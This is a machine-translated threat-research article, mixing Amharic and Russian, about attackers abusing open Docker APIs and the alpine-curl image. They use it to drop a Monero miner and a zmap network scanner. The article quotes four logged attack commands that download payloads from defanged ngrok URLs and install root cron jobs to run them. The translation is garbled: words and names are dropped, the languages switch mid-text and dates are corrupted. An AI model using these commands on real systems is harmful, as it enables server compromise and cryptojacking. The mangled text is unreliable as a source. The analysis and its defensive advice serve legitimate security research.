ስጋቶችን ለመከታተል የፈጠርነውን የ honeypot ኮንቴይነሮችን በመጠቀም የተሰበሰበውን መረጃ ተንትነናል። እና በDocker Hub ላይ በማህበረሰብ የታተመ ምስል በመጠቀም ያልተፈለጉ ወይም ያልተፈቀዱ የክሪፕቶፕ ማዕድን አውጪዎች እንደ ወንበዴ ኮንቴይነሮች ከተሰማሩ ጉልህ እንቅስቃሴ አግኝተናል። ምስሉ ተንኮል አዘል ክሪፕቶፕ ማዕድን አውጪዎችን የሚያቀርብ አገልግሎት አካል ሆኖ ያገለግላል።
በተጨማሪም ከአውታረ መረቦች ጋር ለመስራት ፕሮግራሞች ተጭነዋል ክፍት ጎረቤት ኮንቴይነሮች እና አፕሊኬሽኖች ውስጥ ዘልቀው ለመግባት.
ያለ ምንም የደህንነት እርምጃዎች ወይም ተጨማሪ ሶፍትዌሮች ሳይጫኑ የእኛን የጫጉላ ማስቀመጫዎች ልክ እንደ ነባሪ ቅንጅቶች እንተዋለን። እባክዎን ዶከር ስህተቶችን እና ቀላል ተጋላጭነቶችን ለማስወገድ ለመጀመሪያ ጊዜ ለማዋቀር ምክሮች እንዳሉት ልብ ይበሉ። ነገር ግን ጥቅም ላይ የሚውሉት የማር ማሰሮዎች ኮንቴይነሮች ናቸው፣ በመያዣው መድረክ ላይ ያነጣጠሩ ጥቃቶችን ለመለየት የተነደፉ እንጂ በመያዣው ውስጥ ያሉ መተግበሪያዎች አይደሉም።
የተገኘዉ ተንኮል-አዘል ተግባር ተጋላጭነትን የማይፈልግ እና እንዲሁም ከዶከር ሥሪት የጸዳ ስለሆነ የሚታወቅ ነዉ። በስህተት የተዋቀረ እና ክፍት የሆነ የመያዣ ምስል ማግኘት አጥቂዎች ብዙ ክፍት አገልጋዮችን ለመበከል የሚያስፈልጋቸው ብቻ ነው።
ያልተዘጋው Docker API ተጠቃሚው ሰፋ ያለ ስራ እንዲሰራ ያስችለዋል። , የማስኬጃ መያዣዎችን ዝርዝር ማግኘትን ጨምሮ, ከአንድ የተወሰነ ኮንቴይነር ምዝግብ ማስታወሻዎችን ማግኘት, መጀመር, ማቆም (ግዳጅ ጨምሮ) እና እንዲያውም ከተወሰኑ ቅንብሮች ጋር ከተወሰነ ምስል አዲስ መያዣ መፍጠር.
በግራ በኩል የማልዌር ማቅረቢያ ዘዴ ነው. በስተቀኝ በኩል ምስሎችን ከርቀት ለማውጣት የሚያስችል የአጥቂው አካባቢ ነው።
በ 3762 ክፍት Docker APIs አገር ስርጭት። በ12.02.2019/XNUMX/XNUMX በሾዳን ፍለጋ ላይ የተመሰረተ
የጥቃት ሰንሰለት እና የመጫኛ አማራጮች
ተንኮል-አዘል እንቅስቃሴ በማር ማሰሮዎች እርዳታ ብቻ ሳይሆን ተገኝቷል። የሞኔሮ ክሪፕቶፕ ማይኒንግ ሶፍትዌሮችን ለማሰማራት እንደ ድልድይ ጥቅም ላይ የዋለ ኮንቴይነርን ከመረመርን በኋላ የተጋለጡ Docker APIs (ሁለተኛ ግራፍ ይመልከቱ) ከሾዳን የተገኘው መረጃ ያሳያል። ባለፈው ዓመት ኦክቶበር (2018, የአሁኑ ውሂብ በግምት ተርጓሚ) 856 ክፍት ኤፒአይዎች ብቻ ነበሩ።
የ honeypot ምዝግብ ማስታወሻዎች ምርመራ እንደሚያሳየው የመያዣ ምስል አጠቃቀምም ከመጠቀም ጋር የተያያዘ ነው ደህንነታቸው የተጠበቁ ግንኙነቶችን ለመመስረት ወይም ትራፊክን በይፋ ከሚደረስባቸው ነጥቦች ወደተገለጹ አድራሻዎች ወይም ምንጮች (ለምሳሌ localhost) ለማስተላለፍ መሳሪያ ነው። ይህ አጥቂዎች የክፍያ ጭነት ወደ ክፍት አገልጋይ ሲያደርሱ በተለዋዋጭ ዩአርኤሎችን እንዲፈጥሩ ያስችላቸዋል። ከዚህ በታች የ ngrok አገልግሎትን አላግባብ መጠቀምን ከሚያሳዩ የምዝግብ ማስታወሻዎች ውስጥ የኮድ ምሳሌዎች አሉ።
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”እንደምታየው፣ የተሰቀሉት ፋይሎች የሚወርዱት በየጊዜው ከሚለዋወጡ ዩአርኤሎች ነው። እነዚህ ዩአርኤሎች አጭር የማለቂያ ቀን አላቸው፣ ስለዚህ ክፍያው ካለቀበት ቀን በኋላ ሊወርድ አይችልም።
Есть два варианта полезной нагрузки. Первый — скомпилированный майнер в формате ELF для Linux (определяемый как Coinminer.SH.MALXMR.ATNO), который подключается к пулу для майнинга. Второй — скрипт (TrojanSpy.SH.ZNETMAP.A), предназначенный для получения определенных сетевых инструментов, используемых для сканирования сетевых диапазонов и последующего поиска новых целей.
የ dropper ስክሪፕት ሁለት ተለዋዋጮችን ያስቀምጣል, ከዚያም ምስጠራ ማዕድን ማውጫውን ለማሰማራት ያገለግላሉ. የHOST ተለዋዋጭ ተንኮል አዘል ፋይሎቹ የሚገኙበትን ዩአርኤል ይዟል፣ እና RIP ተለዋዋጭ የሚሰማራው የማዕድን ማውጫው የፋይል ስም (በእውነቱ፣ ሃሽ) ነው። የHOST ተለዋዋጭ የሃሽ ተለዋዋጭ በተለወጠ ቁጥር ይቀየራል። ስክሪፕቱ ሌላ ምንም cryptocurrency ቆፋሪዎች በተጠቃው አገልጋይ ላይ እየሰሩ አለመሆናቸውን ለማረጋገጥ ይሞክራል።
የHOST እና RIP ተለዋዋጮች ምሳሌዎች፣እንዲሁም ሌላ የማዕድን ቆፋሪዎች እየሰሩ አለመሆኑን ለማረጋገጥ የሚያገለግል ኮድ ቅንጭብ
Прежде чем запускать майнер, он переименовывается в nginx. Другие версии этого скрипта переименовывают майнер в другие легитимные сервисы, которые могут присутствовать в окружениях Linux. Этого обычно достаточно для обхода проверок по списку запущенных процессов.
የፍለጋ ስክሪፕት እንዲሁ ባህሪያት አሉት. አስፈላጊዎቹን መሳሪያዎች ለማሰማራት ከተመሳሳይ የዩአርኤል አገልግሎት ጋር ይሰራል. ከነሱ መካከል የ zmap binary ነው, እሱም አውታረ መረቦችን ለመፈተሽ እና ክፍት የሆኑ ወደቦችን ዝርዝር ለማግኘት ያገለግላል. ስክሪፕቱ ከተገኙት አገልግሎቶች ጋር ለመግባባት እና ባነሮችን ለመቀበል የሚያገለግል ሌላ ሁለትዮሽ ይጭናል ስለ የተገኘው አገልግሎት ተጨማሪ መረጃ ለማወቅ (ለምሳሌ ሥሪቱ)።
ስክሪፕቱ እንዲሁ ለመቃኘት አንዳንድ የአውታረ መረብ ክልሎችን አስቀድሞ ይወስናል፣ ነገር ግን ይህ በስክሪፕቱ ስሪት ላይ የተመሰረተ ነው። እንዲሁም ፍተሻውን ከማካሄድዎ በፊት የታለሙ ወደቦችን ከአገልግሎቶቹ ያዘጋጃል-በዚህ አጋጣሚ Docker።
Как только найдены предполагаемые цели — автоматически из них снимаются баннеры. Скрипт также фильтрует цели в зависимости от интересующих его сервисов, приложений, компонентов или платформ: Redis, Jenkins, Drupal, MODX, ፣ Docker 1.16 ደንበኛ እና Apache CouchDB። የተቃኘው አገልጋይ ከአንዳቸው ጋር የሚዛመድ ከሆነ፣ በጽሑፍ ፋይል ውስጥ ተቀምጧል፣ ይህም አጥቂዎች በኋላ ላይ ለቀጣይ ትንተና እና ጠለፋ ሊጠቀሙበት ይችላሉ። እነዚህ የጽሑፍ ፋይሎች በተለዋዋጭ አገናኞች ወደ አጥቂዎቹ አገልጋዮች ይሰቀላሉ። ማለትም ለእያንዳንዱ ፋይል የተለየ ዩአርኤል ጥቅም ላይ ይውላል፣ ይህ ማለት ቀጣይ መዳረሻ አስቸጋሪ ነው።
የጥቃት ቬክተር በሚቀጥሉት ሁለት የኮድ ቁርጥራጮች ላይ እንደሚታየው የዶከር ምስል ነው።
ከላይ ወደ ህጋዊ አገልግሎት እየተሰየመ ነው፣ እና ከታች ደግሞ zmap አውታረ መረቦችን ለመቃኘት እንዴት ጥቅም ላይ እንደሚውል ነው።
ከላይ አስቀድሞ የተገለጹ የአውታረ መረብ ክልሎች አሉ፣ ከታች ደግሞ ዶከርን ጨምሮ አገልግሎቶችን ለመፈለግ የተወሰኑ ወደቦች አሉ።
ቅጽበታዊ ገጽ እይታው እንደሚያሳየው የአልፕስ-ከርል ምስል ከ10 ሚሊዮን ጊዜ በላይ ወርዷል
На основе Alpine Linux и curl, ресурсоэффективного инструмента CLI для передачи файлов по различным протоколам, можно собрать . ባለፈው ምስል ላይ እንደሚታየው ይህ ምስል ቀድሞውኑ ከ 10 ሚሊዮን ጊዜ በላይ ወርዷል. ብዙ ቁጥር ያላቸው ማውረዶች ይህንን ምስል እንደ መግቢያ ነጥብ መጠቀም ማለት ሊሆን ይችላል፤ ይህ ምስል ከስድስት ወራት በፊት ተዘምኗል፤ ተጠቃሚዎች ሌሎች ምስሎችን ከዚህ ማከማቻ ብዙ ጊዜ አላወረዱም። በዶከር ውስጥ - መያዣውን ለማስኬድ ለማዋቀር የሚያገለግል መመሪያ ስብስብ። የመግቢያ ነጥብ ቅንጅቶች ትክክል ካልሆኑ (ለምሳሌ, መያዣው ከበይነመረቡ ክፍት ነው), ምስሉ እንደ ማጥቃት ቬክተር ሊያገለግል ይችላል. አጥቂዎች ያልተዋቀረ ወይም ያልተደገፈ ክፍት መያዣ ካገኙ ክፍያን ለማድረስ ሊጠቀሙበት ይችላሉ።
ይህ ምስል (alpine-curl) እራሱ ተንኮል አዘል እንዳልሆነ ልብ ሊባል የሚገባው ነው, ነገር ግን ከላይ እንደሚታየው, ተንኮል አዘል ተግባራትን ለማከናወን ጥቅም ላይ ሊውል ይችላል. ተመሳሳይ የዶከር ምስሎች ተንኮል አዘል እንቅስቃሴዎችን ለማከናወን ጥቅም ላይ ሊውሉ ይችላሉ. ዶከርን አግኝተን በዚህ ጉዳይ ላይ ከእነሱ ጋር ሠርተናል።
ምክሮች
አጽም ለብዙ ኩባንያዎች, በተለይም ለሚተገበሩ , ፈጣን ልማት እና አቅርቦት ላይ ያተኮረ. ሁሉም ነገር የኦዲት እና የክትትል ደንቦችን ማክበር, የመረጃ ሚስጥራዊነትን የመቆጣጠር አስፈላጊነት እና እንዲሁም አለመታዘዛቸውን በሚያስከትል ከፍተኛ ጉዳት ምክንያት ሁሉም ነገር ተባብሷል. የደህንነት አውቶሜትሽን በእድገት የህይወት ኡደት ውስጥ ማካተት የደህንነት ጉድጓዶችን እንድታገኝ ብቻ ሳይሆን ሊታወቁ የሚችሉ ክፍተቶችን እንድታገኝ ብቻ ሳይሆን አላስፈላጊ የስራ ጫናዎችን እንድትቀንስም ያግዝሃል፣ ለምሳሌ ተጨማሪ ሶፍትዌሮችን ማስኬድ ለእያንዳንዱ የተገኘ ተጋላጭነት ወይም አፕሊኬሽን ከዋለ በኋላ የተሳሳተ ውቅር መፍጠር።
በዚህ ርዕስ ውስጥ የተብራራው ክስተት የሚከተሉትን ምክሮች ጨምሮ ደህንነትን ከመጀመሪያው ጀምሮ ግምት ውስጥ ማስገባት አስፈላጊ መሆኑን ያሳያል.
- ለስርዓት አስተዳዳሪዎች እና ገንቢዎች፡- ሁሉም ነገር ከአንድ አገልጋይ ወይም ከውስጥ አውታረ መረብ የሚመጡ ጥያቄዎችን ለመቀበል ብቻ መዋቀሩን ለማረጋገጥ ሁልጊዜ የእርስዎን የኤፒአይ ቅንብሮች ያረጋግጡ።
- የአነስተኛ መብቶችን መርህ ይከተሉ፡ የመያዣ ምስሎች መፈረማቸውን እና መረጋገጡን፣ ወሳኝ ክፍሎችን መድረስን ይገድቡ (የኮንቴይነር ማስጀመሪያ አገልግሎት) እና ምስጠራን ወደ አውታረ መረብ ግንኙነቶች ያክሉ።
- ተከተል እና የደህንነት ዘዴዎችን ማንቃት, ለምሳሌ. እና አብሮ የተሰራ .
- በመያዣው ውስጥ ስለሚከናወኑ ሂደቶች ተጨማሪ መረጃ ለማግኘት የሩጫ ጊዜዎችን እና ምስሎችን በራስ ሰር መቃኘትን ይጠቀሙ (ለምሳሌ ፣ መፈልፈልን ለመለየት ወይም ተጋላጭነትን ለመፈለግ)። የመተግበሪያ ቁጥጥር እና የታማኝነት ክትትል በአገልጋዮች፣ ፋይሎች እና የስርዓት አካባቢዎች ላይ ያልተለመዱ ለውጦችን ለመከታተል ይረዳል።
Trendmicro DevOps ቡድኖች ደህንነቱ በተጠበቀ ሁኔታ እንዲገነቡ፣ በፍጥነት እንዲለቁ እና የትም እንዲጀምሩ ያግዛል። Trend ማይክሮ በድርጅቱ የዴቭኦፕስ ቧንቧ መስመር ላይ ኃይለኛ፣ የተስተካከለ እና አውቶሜትድ ደህንነትን ያቀርባል እና በርካታ የአደጋ መከላከያዎችን ይሰጣል። በሂደት ጊዜ አካላዊ፣ ምናባዊ እና የደመና የስራ ጫናዎችን ለመጠበቅ። እንዲሁም የመያዣ ደህንነትን ይጨምራል и የዶከር ኮንቴይነር ምስሎችን ለማልዌር እና ተጋላጭነቶችን በማንኛውም የእድገት መስመር ላይ በመቃኘት አደጋ ከመሰማራታቸው በፊት ለመከላከል።
የስምምነት ምልክቶች
ተዛማጅ ሃሽ
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
በ የተለማመዱ ተናጋሪዎች እድሉን ለመቀነስ ወይም ከላይ የተገለፀውን ሁኔታ ሙሉ በሙሉ ለማስወገድ በመጀመሪያ ምን መቼቶች መደረግ እንዳለባቸው ያሳያሉ። እና ከኦገስት 19-21 በመስመር ላይ የተጠናከረ እነዚህን እና መሰል የደህንነት ችግሮችን ከስራ ባልደረቦች እና ከተለማመዱ አስተማሪዎች ጋር በክብ ጠረጴዛ ላይ መወያየት ትችላላችሁ።
ምንጭ: hab.com
